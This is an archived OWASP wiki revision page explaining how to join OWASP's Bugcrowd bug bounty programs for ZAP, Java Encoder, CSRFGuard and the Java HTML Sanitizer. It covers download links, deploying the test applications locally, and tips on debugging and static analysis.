This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org

Difference between revisions of "Get Started with OWASP Bug Bounty"

From OWASP
Jump to: navigation, search
(Created page with "OWASP Bug Bounty programs are run different from most traditional Bug Bounties. First of all, the applications to be tested are not available as deployed web applications onli...")
 
(Questions)
 
(25 intermediate revisions by the same user not shown)
Line 2: Line 2:
  
 
=OWASP ZAP Bug Bounty=
 
=OWASP ZAP Bug Bounty=
 +
The OWASP ZAP Bug Bounty program can be found here:
 +
https://bugcrowd.com/owaspzap
 +
 
OWASP ZAP is a client application written in JAVA. Therefore is important that you keep in mind the scope of the bounty.
 
OWASP ZAP is a client application written in JAVA. Therefore is important that you keep in mind the scope of the bounty.
Download the version mentioned on the scope and install it on your computer.
+
Download the version(2.5.0) mentioned on the scope and install it on your computer.
 +
https://github.com/zaproxy/zaproxy/wiki/Downloads
  
=Tips=
+
==Bug Bounty Tips==
*OWASP ZAP is an open source application, meaning that you can actually debug it while testing it. This offers you a much better view of what is happening, but also, you have the ability to white-test the application and find out vulnerable Java Methods
+
 
 +
===Check the code===
 +
OWASP ZAP is an open source application, meaning that you have access to the source code and you can debug it while testing it. This offers you a much better view of what is happening, but also, you have the ability to white-test the application and find out vulnerable Java Methods faster than the Blackbox approach.
 +
 
 +
*You will need to run ZAP within a Java IDE like Eclipse. The easiest way to get ZAP running this way is to follow these instructions here:https://github.com/zaproxy/zaproxy/wiki/Building or follow these videos:
 +
{|
 +
|-
 +
{{#ev:youtube|1UsH1jSnE3c}} 
 +
{{#ev:youtube|qhm1g1klyas}} 
 +
{{#ev:youtube|xevZ7n7ETMI}} 
 +
{{#ev:youtube|n9mQASWRcps}}
 +
|}
  
 
*You can also use STATS analysis tools that might unmask vulnerable methods.
 
*You can also use STATS analysis tools that might unmask vulnerable methods.
=Scope=
+
 
 +
OWASP Source code can be found here:https://github.com/zaproxy/zaproxy/
 +
 
 +
==Scope==
  
 
Any design or implementation issue that is reproducible and substantially affects the security of ZAP users is likely to be in scope for the program, but in particular:
 
Any design or implementation issue that is reproducible and substantially affects the security of ZAP users is likely to be in scope for the program, but in particular:
  
Remote code execution [1]
+
*Remote code execution [1]
Unauthorized API actions [1]
+
*Unauthorized API actions [1]
 +
 
 +
=OWASP JAVA Encoder Bug Bounty =
 +
This bounty program is to be found here:
 +
https://bugcrowd.com/owaspjavaencoder
 +
 
 +
Please make sure your read carefully the scope of the bounty clear.
 +
 
 +
==How to deploy it==
 +
OWASP Java Encode is actually a Java library. For the purpose of this bounty , the library has been deployed within a Dummy Java application of just consisting a web form. You can download the WAR file here:
 +
https://github.com/OWASP/OWASPBugBounty/tree/master/JavaEncoder/war-files
 +
 
 +
If you have no experience deploying a war file as an application, you can decide to run it within a IDE like Eclipse or deployed it into an Apache Server. Follow the following videos if you need more information regarding this:
 +
{|
 +
|-
 +
{{#ev:youtube|GBKzjMwQMoQ}} 
 +
{{#ev:youtube|kLgquZ2FiuQ}} 
 +
{{#ev:youtube|9X9DA8oVodk}}
 +
|}
 +
 
 +
==Bug Bounty Tips==
 +
Again, this application is fully open source and you have access to the source code. You can try STATS(Static Analysis) tools or debug the application while testing it.
 +
https://en.wikipedia.org/wiki/FindBugs
 +
 
 +
=OWASP CRSFGuard Bug Bounty=
 +
OWASP CRSFGuard Bug Bounty program can be found here:
 +
https://bugcrowd.com/owaspcrsfguard
 +
 
 +
Please read careful the scope of the bounty and make sure you understand the target.
 +
 
 +
For the purpose of this bounty , the library has been deployed within a Dummy Java application of just consisting a web form. You can download the entire app source code file here:
 +
https://github.com/OWASP/OWASPBugBounty/tree/master/CRSFGuard
 +
Download :bountyguard.zip
 +
 
 +
You can open the Maven project in Eclipse IDE for Java Developers: https://www.eclipse.org/downloads/packages/eclipse-ide-java-developers/lunasr2
 +
If you are not familiar opening Maven projects in Eclipse IDE , check the following video:
 +
{|
 +
|-
 +
{{#ev:youtube|xWXPJexUPHg}} 
 +
|}
 +
 
 +
=OWASP JAVA HTML Sanitizer Bug Bounty =
 +
This bounty program is to be found here:
 +
https://bugcrowd.com/owaspjavasanitizer
 +
 
 +
Please make sure your read carefully the scope of the bounty clear.
 +
 
 +
==How to deploy it==
 +
OWASP Java  HTML Sanitize is actually a Java library. For the purpose of this bounty , the library has been deployed within a dummy Java application of just consisting a web form. You can download the WAR file here:
 +
https://github.com/OWASP/OWASPBugBounty/tree/master/JavaHTMLSanitizer/war-files
 +
 
 +
If you have no experience deploying a war file as an application, you can decide to run it within a IDE like Eclipse or deployed it into an Apache Server. Follow the following videos if you need more information regarding this:
 +
{|
 +
|-
 +
{{#ev:youtube|GBKzjMwQMoQ}} 
 +
{{#ev:youtube|kLgquZ2FiuQ}} 
 +
{{#ev:youtube|9X9DA8oVodk}}
 +
|}
 +
 
 +
=Questions=
 +
If you have more questions regarding the program or how to join it please contact: [email protected]

Latest revision as of 19:31, 19 September 2016

OWASP Bug Bounty programs are run different from most traditional Bug Bounties. First of all, the applications to be tested are not available as deployed web applications online. For this part you will need to download the applications and deploy or install them on your computer. The following is a guideline for each bug bounty program we are running:

OWASP ZAP Bug Bounty

The OWASP ZAP Bug Bounty program can be found here: https://bugcrowd.com/owaspzap

OWASP ZAP is a client application written in JAVA. Therefore is important that you keep in mind the scope of the bounty. Download the version(2.5.0) mentioned on the scope and install it on your computer. https://github.com/zaproxy/zaproxy/wiki/Downloads

Bug Bounty Tips

Check the code

OWASP ZAP is an open source application, meaning that you have access to the source code and you can debug it while testing it. This offers you a much better view of what is happening, but also, you have the ability to white-test the application and find out vulnerable Java Methods faster than the Blackbox approach.

 
 
 
  • You can also use STATS analysis tools that might unmask vulnerable methods.

OWASP Source code can be found here:https://github.com/zaproxy/zaproxy/

Scope

Any design or implementation issue that is reproducible and substantially affects the security of ZAP users is likely to be in scope for the program, but in particular:

  • Remote code execution [1]
  • Unauthorized API actions [1]

OWASP JAVA Encoder Bug Bounty

This bounty program is to be found here: https://bugcrowd.com/owaspjavaencoder

Please make sure your read carefully the scope of the bounty clear.

How to deploy it

OWASP Java Encode is actually a Java library. For the purpose of this bounty , the library has been deployed within a Dummy Java application of just consisting a web form. You can download the WAR file here: https://github.com/OWASP/OWASPBugBounty/tree/master/JavaEncoder/war-files

If you have no experience deploying a war file as an application, you can decide to run it within a IDE like Eclipse or deployed it into an Apache Server. Follow the following videos if you need more information regarding this:

 
 

Bug Bounty Tips

Again, this application is fully open source and you have access to the source code. You can try STATS(Static Analysis) tools or debug the application while testing it. https://en.wikipedia.org/wiki/FindBugs

OWASP CRSFGuard Bug Bounty

OWASP CRSFGuard Bug Bounty program can be found here: https://bugcrowd.com/owaspcrsfguard

Please read careful the scope of the bounty and make sure you understand the target.

For the purpose of this bounty , the library has been deployed within a Dummy Java application of just consisting a web form. You can download the entire app source code file here: https://github.com/OWASP/OWASPBugBounty/tree/master/CRSFGuard Download :bountyguard.zip

You can open the Maven project in Eclipse IDE for Java Developers: https://www.eclipse.org/downloads/packages/eclipse-ide-java-developers/lunasr2 If you are not familiar opening Maven projects in Eclipse IDE , check the following video:

 

OWASP JAVA HTML Sanitizer Bug Bounty

This bounty program is to be found here: https://bugcrowd.com/owaspjavasanitizer

Please make sure your read carefully the scope of the bounty clear.

How to deploy it

OWASP Java HTML Sanitize is actually a Java library. For the purpose of this bounty , the library has been deployed within a dummy Java application of just consisting a web form. You can download the WAR file here: https://github.com/OWASP/OWASPBugBounty/tree/master/JavaHTMLSanitizer/war-files

If you have no experience deploying a war file as an application, you can decide to run it within a IDE like Eclipse or deployed it into an Apache Server. Follow the following videos if you need more information regarding this:

 
 

Questions

If you have more questions regarding the program or how to join it please contact: [email protected]